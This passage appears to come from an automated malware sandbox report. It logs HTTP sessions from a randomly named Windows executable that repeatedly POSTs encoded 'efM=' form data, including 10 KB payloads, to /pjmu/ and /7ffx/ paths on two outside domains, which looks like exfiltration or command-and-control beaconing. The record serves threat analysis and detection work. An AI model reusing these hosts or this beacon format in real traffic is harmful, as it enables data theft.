                                                    Origin: http://www.zhuan-tou.com
                                                    Referer: http://www.zhuan-tou.com/pjmu/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 79 62 59 67 61 55 32 42 57 31 30 38 45 79 64 30 36 35 6f 43 77 64 4a 65 56 43 31 66 31 6f 59 4c 39 6d 48 46 49 33 39 54 47 4c 31 33 49 68 4c 44 57 4e 4d 42 38 4e 2f 77 73 64 2f 4f 73 4f 44 7a 4e 54 71 77 43 6a 48 62 78 38 4c 5a 4f 39 48 2f 56 66 4b 56 47 36 61 4d 35 32 47 43 67 39 47 30 4f 6e 7a 55 58 32 6c 4e 46 52 37 41 46 67 2f 75 78 6f 35 47 37 58 53 56 6d 51 79 4b 58 64 56 62 5a 75 34 34 67 72 6f 63 6a 4a 6b 53 37 4a 56 6c 4b 79 67 58 2b 4b 30 58 70 72 43 69 5a 56 66 6a 59 45 4e 41 7a 6f 2b 57 55 4d 6a 6f 5a 51 49 65 33 4d 2f 44 6c 4e 64 74 61 46 32 5a 56 70 4f 34 38 75 37 6e 31 38 48 69 43 49 3d
                                                    Data Ascii: efM=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1oYL9mHFI39TGL13IhLDWNMB8N/wsd/OsODzNTqwCjHbx8LZO9H/VfKVG6aM52GCg9G0OnzUX2lNFR7AFg/uxo5G7XSVmQyKXdVbZu44grocjJkS7JVlKygX+K0XprCiZVfjYENAzo+WUMjoZQIe3M/DlNdtaF2ZVpO48u7n18HiCI=
                                                    Aug 5, 2024 15:31:37.858598948 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 05 Aug 2024 13:31:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.45540138.12.1.29802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:39.580959082 CEST10808OUTPOST /pjmu/ HTTP/1.1
                                                    Host: www.zhuan-tou.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.zhuan-tou.com
                                                    Referer: http://www.zhuan-tou.com/pjmu/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 79 62 59 67 61 55 32 42 57 31 30 38 45 79 64 30 36 35 6f 43 77 64 4a 65 56 43 31 66 31 51 59 4c 50 65 48 45 72 50 39 53 47 4c 31 30 49 68 4f 44 57 4e 72 42 38 56 37 77 73 52 76 4f 71 53 44 7a 6f 50 71 67 67 4c 48 53 78 38 4c 51 75 39 61 68 6c 66 36 56 47 72 64 4d 34 47 47 43 67 39 47 30 50 58 7a 58 43 4b 6c 50 46 52 38 57 56 67 4e 2f 42 6f 64 47 37 50 43 56 6d 55 49 4b 6d 39 56 62 35 65 34 39 57 2f 6f 51 6a 4a 6d 56 37 4a 4e 6c 50 71 76 58 2b 57 57 58 70 66 6b 69 62 4a 66 69 35 31 74 63 77 45 39 4a 31 45 4b 72 61 77 2b 66 47 73 4b 45 57 42 71 38 4b 74 68 4e 55 70 66 38 38 66 30 2b 68 41 61 6a 43 75 5a 45 56 76 33 37 34 4d 6e 47 62 7a 45 4b 4f 61 42 30 67 56 6b 4d 6e 2f 43 76 47 47 67 69 42 4c 6d 4e 6f 73 4d 6d 4a 55 74 61 77 34 55 4e 33 39 71 6f 32 75 30 32 46 6d 5a 2f 53 77 2b 34 37 36 48 2f 35 37 62 4f 2b 6d 64 41 69 49 41 4b 6c 6b 72 35 53 6f 31 30 4e 2b 4c 2f 68 52 4d 33 63 32 6f 42 57 31 73 4b 61 63 48 59 6b 76 52 70 5a 38 34 30 73 76 45 57 30 [TRUNCATED]
                                                    Data Ascii: efM=+jf92ON16YkIfybYgaU2BW108Eyd065oCwdJeVC1f1QYLPeHErP9SGL10IhODWNrB8V7wsRvOqSDzoPqggLHSx8LQu9ahlf6VGrdM4GGCg9G0PXzXCKlPFR8WVgN/BodG7PCVmUIKm9Vb5e49W/oQjJmV7JNlPqvX+WWXpfkibJfi51tcwE9J1EKraw+fGsKEWBq8KthNUpf88f0+hAajCuZEVv374MnGbzEKOaB0gVkMn/CvGGgiBLmNosMmJUtaw4UN39qo2u02FmZ/Sw+476H/57bO+mdAiIAKlkr5So10N+L/hRM3c2oBW1sKacHYkvRpZ840svEW0fOhsGiM3bLZNvi7d03//nrNrlOqwhNaq+pIxT84tZzBg68qRWSZeh9m2JTKTTZ/7rF96nJGt2Esfk9Y4qlQQBALgmS+U+z4PimlvFaVV3KHn0VKK/NgIeIdNNQSsR6+Biy2bK2SFWoNGUJCbydMap2jzGoROsfTnORZs5JxKZEso+n6B9YMoErhHYrJK0LSz6Ty5+kmrPvbFnkpeX+oqIYwBY3M9PmzkFtEtsivIFC+Fx5HV8nSU92+CfVeWv7rShahDINkE8K00Qi0dZqdnJINKHFE5zQj3ouvR99L1sdBN51spcO6NT7rXFgy7sI8cQyf4ofMV9u4Mi0b5NiIblVXbm5Iarugj/mdw3RwH5Ojw8S1w9JFGoPCAuTeGZZpn/f6GEC8uFaJ/BpaRFnNvoFiRZIGbIFy4hQgKgBJAze28G7fXqrbWXsPIIfnOUjz4kLQwNBEi0kYckpvj4TuLnCkZ1Lsgr6wxE3bBdPs1JHhbpwgrwRvP6KSITtjVe4VNYv3YY+lt3adQbS1LXFNKahg/ztzJWHEYkwtAavWvFPLeAUcNpyW7L7ovcAIGq9giiRpHpp7xcBPRbGrNzNfi/PPe6Bdum8zD8BUDX741yrurL5n6mXkPyKON6ax708VX+UpxSGWXFXGBTNWAFcdqiUJQpGOQ9TC7wS [TRUNCATED]
                                                    Aug 5, 2024 15:31:40.562031031 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 05 Aug 2024 13:31:40 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.45540238.12.1.29802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:42.111552954 CEST438OUTGET /pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.zhuan-tou.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:31:42.990638018 CEST691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 05 Aug 2024 13:31:42 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.455403217.116.0.191802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:48.299766064 CEST703OUTPOST /7ffx/ HTTP/1.1
                                                    Host: www.lecoinsa.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lecoinsa.net
                                                    Referer: http://www.lecoinsa.net/7ffx/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 57 50 34 55 38 35 51 38 49 43 6e 76 45 65 32 35 32 6d 53 45 4a 61 6c 6b 2b 57 78 48 43 53 54 68 63 4c 39 59 2f 68 6b 4a 63 41 53 52 6a 2f 2f 75 7a 72 7a 39 6f 34 51 6a 50 49 56 77 51 36 69 38 50 46 49 6d 62 76 6a 41 65 7a 4d 72 30 6d 66 55 58 57 52 71 43 69 2b 36 4e 68 37 4c 35 57 38 62 42 43 63 6f 78 34 7a 6f 52 42 35 62 43 6c 44 6e 31 36 46 61 36 37 64 2b 48 47 46 35 2b 6b 48 58 53 44 74 2f 57 6d 4b 78 54 35 6e 78 4f 4b 37 75 33 69 4c 5a 49 35 47 78 4f 45 69 51 46 41 33 38 36 55 6d 7a 32 73 33 53 7a 39 6f 77 7a 35 46 49 39 56 4b 48 59 72 39 70 63 4e 45 70 35 78 42 63 66 67 3d 3d
                                                    Data Ascii: efM=WP4U85Q8ICnvEe252mSEJalk+WxHCSThcL9Y/hkJcASRj//uzrz9o4QjPIVwQ6i8PFImbvjAezMr0mfUXWRqCi+6Nh7L5W8bBCcox4zoRB5bClDn16Fa67d+HGF5+kHXSDt/WmKxT5nxOK7u3iLZI5GxOEiQFA386Umz2s3Sz9owz5FI9VKHYr9pcNEp5xBcfg==
                                                    Aug 5, 2024 15:31:48.976499081 CEST572INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:48 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/
                                                    Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                    Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.455404217.116.0.191802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:50.840605974 CEST723OUTPOST /7ffx/ HTTP/1.1
                                                    Host: www.lecoinsa.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lecoinsa.net
                                                    Referer: http://www.lecoinsa.net/7ffx/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 57 50 34 55 38 35 51 38 49 43 6e 76 46 2f 47 35 37 6c 36 45 63 71 6c 6e 6e 57 78 48 4a 79 54 74 63 4c 35 59 2f 6b 63 5a 64 32 43 52 69 62 7a 75 79 75 66 39 76 34 51 6a 58 34 56 31 65 61 69 72 50 46 4d 66 62 71 62 41 65 7a 49 72 30 6a 62 55 58 68 46 74 43 79 2b 34 56 52 37 7a 33 32 38 62 42 43 63 6f 78 34 6d 44 52 46 56 62 42 55 7a 6e 31 62 46 56 6d 4c 64 35 4f 6d 46 35 70 30 47 63 53 44 73 51 57 6e 57 62 54 37 66 78 4f 50 58 75 35 58 33 61 43 35 47 7a 41 6b 69 46 50 67 65 44 69 56 44 6c 6f 38 6e 74 39 64 59 63 32 2f 55 53 73 6b 72 51 4b 72 5a 61 42 4b 4e 64 30 79 38 56 45 67 7a 62 54 45 63 65 76 70 4d 45 55 48 4e 35 4f 4d 69 46 66 31 55 3d
                                                    Data Ascii: efM=WP4U85Q8ICnvF/G57l6EcqlnnWxHJyTtcL5Y/kcZd2CRibzuyuf9v4QjX4V1eairPFMfbqbAezIr0jbUXhFtCy+4VR7z328bBCcox4mDRFVbBUzn1bFVmLd5OmF5p0GcSDsQWnWbT7fxOPXu5X3aC5GzAkiFPgeDiVDlo8nt9dYc2/USskrQKrZaBKNd0y8VEgzbTEcevpMEUHN5OMiFf1U=
                                                    Aug 5, 2024 15:31:51.526330948 CEST572INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:51 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/
                                                    Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                    Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.455405217.116.0.191802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:31:53.384526968 CEST10805OUTPOST /7ffx/ HTTP/1.1
                                                    Host: www.lecoinsa.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lecoinsa.net
                                                    Referer: http://www.lecoinsa.net/7ffx/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 57 50 34 55 38 35 51 38 49 43 6e 76 46 2f 47 35 37 6c 36 45 63 71 6c 6e 6e 57 78 48 4a 79 54 74 63 4c 35 59 2f 6b 63 5a 64 32 4b 52 69 6f 37 75 79 4a 72 39 75 34 51 6a 4a 49 56 30 65 61 6a 70 50 46 30 62 62 71 48 51 65 78 67 72 31 46 6e 55 52 54 39 74 52 53 2b 34 4a 68 37 49 35 57 39 54 42 44 77 73 78 34 32 44 52 46 56 62 42 57 37 6e 38 71 46 56 6b 4c 64 2b 48 47 46 31 2b 6b 48 37 53 44 6c 6e 57 6b 36 68 54 4b 2f 78 4f 72 33 75 30 46 66 61 59 35 47 31 4e 45 6a 41 50 67 43 69 69 56 66 66 6f 2f 37 48 39 65 45 63 32 2b 35 4a 30 67 79 4f 54 71 35 4a 57 34 5a 66 79 31 51 62 4a 42 62 56 59 6c 55 62 78 4a 45 4b 66 6c 77 64 52 2b 75 34 45 6a 57 35 6a 42 71 58 74 4a 7a 54 6b 2b 72 55 6b 4f 6b 30 6c 32 62 76 42 37 45 46 6b 72 39 41 63 63 4a 63 47 63 6c 64 36 67 6d 4f 53 41 6e 62 53 53 74 47 35 62 43 43 38 2f 6c 57 36 52 70 2b 58 67 4c 77 78 6c 52 39 37 4a 41 49 65 30 74 65 2b 63 34 6c 42 2f 75 53 65 39 78 4c 59 35 47 76 6e 33 51 39 62 2b 5a 67 34 38 34 63 49 73 6b 68 69 77 31 35 4c 63 63 4d 76 63 [TRUNCATED]
                                                    Data Ascii: efM=WP4U85Q8ICnvF/G57l6EcqlnnWxHJyTtcL5Y/kcZd2KRio7uyJr9u4QjJIV0eajpPF0bbqHQexgr1FnURT9tRS+4Jh7I5W9TBDwsx42DRFVbBW7n8qFVkLd+HGF1+kH7SDlnWk6hTK/xOr3u0FfaY5G1NEjAPgCiiVffo/7H9eEc2+5J0gyOTq5JW4Zfy1QbJBbVYlUbxJEKflwdR+u4EjW5jBqXtJzTk+rUkOk0l2bvB7EFkr9AccJcGcld6gmOSAnbSStG5bCC8/lW6Rp+XgLwxlR97JAIe0te+c4lB/uSe9xLY5Gvn3Q9b+Zg484cIskhiw15LccMvc9P1nJqdsLEwjzpfLU5xTleBjP9bLpRZ4AvGH7XwJcOD8pb70TA2t+WWsmC/b/yIslhe/u+3/WiBOVuYao5wlkhaou+SkdJUt61g0TW/yr2kiDRZA7uY2KTpW/6bA7zmTAGD2rwhmG2jHocxvYK9ICv4A0XR9ioBP7+3SOOKLyKenUkBfhXZ3E+lztZKV29jNSm6UbHbhdykQaDfxLcjYXSAnNqCcSt6LtBgXUx43Lq3ie+wV9qHVeweQrYRxh3pTA/XKE1fwlm+xfal7nleU0iPBOiMQC7UtZP3idsmtC9M0xmz9BrKaBCoIYLpwRr1JMSakrCbfqhPQqUzegfBClYJd6k7bWM23YEUi+16alRMkEBigdW2+Y4DT447PVQiNReN6r6UT50na5GG3IZkPSsGaj3801J20xSj8xU5rikRimcygg0c05m88RJdybnEEWLUQ0LMVCeZSN3/2XkTQ5EL+W4gDd71StsjJe6pVcVCfHsDRDOF0Zz670BELJyXZMXw9vHoZ/UnHHDQ0J1lAF1epI5QuEvY24OVa54vUzvZk3lXPoEQyfQVjHUN9SSAxtEsL+t35Xvky883PBPKBzNsK91f9HjKa4cg89dJsp/Jb8MeSGpu38BQPWOTwrrZG7snm5FqX20Vhr2xL+v+g2kds4qUSkQUA3i [TRUNCATED]
                                                    Aug 5, 2024 15:31:54.185596943 CEST572INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:31:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Location: http://lecoinsa.net/7ffx/
                                                    Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
